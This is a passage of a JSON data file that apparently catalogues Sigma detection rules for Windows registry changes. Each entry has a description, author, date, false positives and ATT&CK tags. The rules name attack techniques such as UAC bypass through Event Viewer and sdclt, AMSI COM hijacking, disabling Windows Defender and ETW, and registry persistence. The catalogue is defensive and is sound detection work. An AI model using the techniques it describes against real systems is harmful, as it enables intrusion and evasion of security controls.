"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" ], "tags": [ "attack.persistence", "attack.t1547.010" ] }, "related": [ { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "value": "Bypass UAC Using Event Viewer" }, { "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], "filename": "registry_set_persistence_mpnotify.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/mpnotify.html", "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", "value": "Potential Persistence Via Mpnotify" }, { "description": "Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-23", "falsepositive": [ "Unlikely" ], "filename": "registry_set_odbc_driver_registered_susp.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml" ], "tags": [ "attack.persistence", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4", "value": "Potentially Suspicious ODBC Driver Registered" }, { "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-01-10", "falsepositive": [ "Legitimate Addin Installation" ], "filename": "registry_set_persistence_office_vsto.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://vanmieghem.io/stealth-outlook-persistence/", "https://twitter.com/_vivami/status/1347925307643355138", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" ], "tags": [ "attack.t1137.006", "attack.persistence" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "value": "Potential Persistence Via Visual Studio Tools for Office" }, { "description": "Detects changes to the \"HVCIDisallowedImages\" registry value to potentially add a driver to the list, in order to prevent it from loading.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)", "creation_date": "2023-12-05", "falsepositive": [ "Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended" ], "filename": "registry_set_hvci_disallowed_images.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf", "https://x.com/yarden_shafir/status/1822667605175324787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "555155a2-03bf-4fe7-af74-d176b3fdbe16", "value": "Driver Added To Disallowed Images In HVCI - Registry" }, { "description": "Detects changes to registry keys related to \"Trusted Location\" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-21", "falsepositive": [ "Other unknown legitimate or custom paths need to be filtered to avoid false positives" ], "filename": "registry_set_office_trusted_location_uncommon.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f742bde7-9528-42e5-bd82-84f51a8387d2", "value": "Uncommon Microsoft Office Trusted Location Added" }, { "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", "meta": { "author": "frack113", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_susp_user_shell_folders.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "value": "Modify User Shell Folders Startup Value" }, { "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_administrative_share.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "value": "Disable Administrative Share Creation at Startup" }, { "description": "Detects changes to the \"MaxMpxCt\" registry value.\nMaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.\nRansomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-03-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_optimize_file_sharing_network.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1", "https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/", "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware", "https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_optimize_file_sharing_network.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e6a9e62-627e-496c-aef5-bfa39da29b5e", "value": "MaxMpxCt Registry Value Changed" }, { "description": "Detects the registration of a new ODBC driver.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-23", "falsepositive": [ "Likely" ], "filename": "registry_set_odbc_driver_registered.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "3390fbef-c98d-4bdd-a863-d65ed7c610dd", "value": "New ODBC Driver Registered" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", "value": "Wow6432Node Classes Autorun Keys Modification" }, { "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-21", "falsepositive": [ "IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean." ], "filename": "registry_set_ime_non_default_extension.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b888e3f2-224d-4435-b00b-9dd66e9ea1f1", "value": "Uncommon Extension In Keyboard Layout IME File Registry Value" }, { "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate SIP being registered by the OS or different software." ], "filename": "registry_set_sip_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/tree/master/SIP", "https://persistence-info.github.io/Data/codesigning.html", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1553.003" ] }, "related": [ { "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "value": "Persistence Via New SIP Provider" }, { "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_autodial_dll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/autodialdll.html", "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "value": "Potential Persistence Via AutodialDLL" }, { "description": "Detects the abuse of custom file open handler, executing powershell", "meta": { "author": "CD_R0M_", "creation_date": "2022-06-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "value": "Custom File Open Handler Executes PowerShell" }, { "description": "Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.", "meta": { "author": "@SerkinValery, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-12", "falsepositive": [ "Legitimate internal requirements." ], "filename": "registry_set_clickonce_trust_prompt.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", "https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac9159cc-c364-4304-8f0a-d63fc1a0aabb", "value": "ClickOnce Trust Prompt Tampering" }, { "description": "Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of \"DisableAIDataAnalysis\" to \"0\".\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2024-06-02", "falsepositive": [ "Legitimate use/activation of Windows Recall" ], "filename": "registry_set_enable_windows_recall.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis", "https://learn.microsoft.com/en-us/windows/client-management/manage-recall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75180c5f-4ea1-461a-a4f6-6e4700c065d4", "value": "Windows Recall Feature Enabled - Registry" }, { "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", "meta": { "author": "Omkar Gudhate", "creation_date": "2020-09-27", "falsepositive": [ "Unknown" ], "filename": "registry_set_comhijack_sdclt.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.exploit-db.com/exploits/47696", "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1546", "attack.t1548" ] }, "related": [ { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", "value": "COM Hijack via Sdclt" }, { "description": "Detect the creation of a service with a service binary located in a suspicious directory", "meta": { "author": "Florian Roth (Nextron Systems), frack113", "creation_date": "2022-05-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_creation_service_susp_folder.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "value": "Service Binary in Suspicious Folder" }, { "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-01", "falsepositive": [ "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "filename": "registry_set_susp_printer_driver.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1410545674773467140", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1574", "cve.2021-1675" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0813366-0407-449a-9869-a2db1119dc41", "value": "Suspicious Printer Driver Empty Manufacturer" }, { "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_powershell_execution_policy.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "value": "Potential PowerShell Execution Policy Tampering" }, { "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", "meta": { "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "creation_date": "2017-03-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_sdclt.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", "value": "UAC Bypass via Sdclt" }, { "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "creation_date": "2018-08-25", "falsepositive": [ "Software using weird folders for updates" ], "filename": "registry_set_susp_run_key_img_folder.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "value": "New RUN Key Pointing to Suspicious Folder" }, { "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_amsi_com_hijack.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "160d2780-31f7-4922-8b3a-efce30e63e96", "value": "Potential AMSI COM Server Hijacking" }, { "description": "Detects the Setting of Windows Defender Exclusions", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-07-06", "falsepositive": [ "Administrator actions" ], "filename": "registry_set_defender_exclusions.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/_nullbind/status/1204923340810543109", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", "value": "Windows Defender Exclusions Added - Registry" }, { "description": "Detects potential persistence activity via outlook home page.\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.\n", "meta": { "author": "Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand", "creation_date": "2021-06-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_outlook_homepage.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml" ], "tags": [ "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "value": "Potential Persistence Via Outlook Home Page" }, { "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_rpcrt4_etw_tamper.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90f342e1-1aaa-4e43-b092-39fda57ed11e", "value": "ETW Logging Disabled For rpcrt4.dll" }, { "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_wmp.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "value": "UAC Bypass Using Windows Media Player - Registry" }, { "description": "Detects potential persistence using Appx DebugPath", "meta": { "author": "frack113", "creation_date": "2022-07-27", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_appx_debugger.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/rootm0s/WinPwnage", "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", "value": "Potential Persistence Using DebugPath" }, { "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", "meta": { "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "creation_date": "2022-08-01", "falsepositive": [ "Administrator actions" ], "filename": "registry_set_disable_windows_defender_service.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "value": "Windows Defender Service Disabled - Registry" }, { "description": "Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Thurein Oo", "creation_date": "2023-10-18", "falsepositive": [ "Likely" ], "filename": "registry_set_powershell_enablescripts_enabled.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml" ], "tags": [ "attack.execution" ] }, "uuid": "8218c875-90b9-42e2-b60d-0b0069816d10", "value": "PowerShell Script Execution Policy Enabled" }, { "description": "Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the \"UACDisableNotify\" value.\nUAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.\nWhen \"UACDisableNotify\" is set to 1, UAC prompts are suppressed.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", 